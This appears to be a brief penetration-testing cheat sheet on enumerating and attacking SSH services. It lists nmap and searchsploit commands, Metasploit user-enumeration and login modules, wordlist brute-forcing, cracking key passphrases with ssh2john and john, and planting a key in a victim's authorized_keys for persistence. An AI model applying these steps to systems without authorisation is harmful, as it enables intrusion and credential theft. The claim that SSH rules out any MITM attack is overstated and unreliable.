SSH Enumeration
What Does SSH Stands For ?
Secure Shell
, is a service that helps us to access machines remotely in a very secure way. Secure way in the sense, this connection encrypts communication by using strong crypto-graphic algorithms, So that there is no way to perform a MITM attack. In a company, Whenever the Network Administrator wants to access any of thier machines SSH would be thier first choice (via putty)
.
SSH
provides both password and public key-based authentication !
Secure access to the remote devices.
Secure file transfer.
Run commands on remote devices in a secure way.
Help in managing network devices and servers securely, Extensive use in managing data centers.
You can identify open ports and services by using nmap
.
nmap -sCV <IP> // When SSH is open, -sCV performs all various kinds off script scans.
searchsploit openssh // Searches publicly available exploits via the command line.
Connect Remote Machine Using SSH ?
You can connect remote machine by providing inputs username and hostname in below format. For successful connection, correct password need to be provided.
ssh <username>@<hostname>
You can also connect directly providing remote IP. You will get "Connection refused" if ssh service not open.
ssh 192.168.1.16
User Enumeration Via Metasploit ?
Metasploit Framework is preinstalled on Kali Linux
. You can run framework by using below command
msfconsole -q
search - ssh_enumusers
ssh_login
ssh_login_pubkey
show options and set
exploit
Bruteforce Username or Password ?
Once ssh port is open, use seclists
wordlist to bruteforce username and password.
Many scripts are available to enumerate ssh. You can display all available scripts by using below command.
ls -l /usr/share/nmap/scripts/ | grep ssh // Displays all ssh nmap scripts (NSE).
use ssh-brute.nse to bruteforce the box or the application.
While pentesting a box or an application, we get to see port 22
is open
. The first thing that should strike us is :
If suppose we find an id_rsa.pub : Public Key that can be used in authorized_keys for login.
If suppose we find an id_rsa : Private Key that is used for login.
If it asks for a password => use ssh2john and john.
ssh -i id_rsa user@192.168.1.18
For passwordless login, add id_rsa.pub to the victim's authorized_keys.
Last updated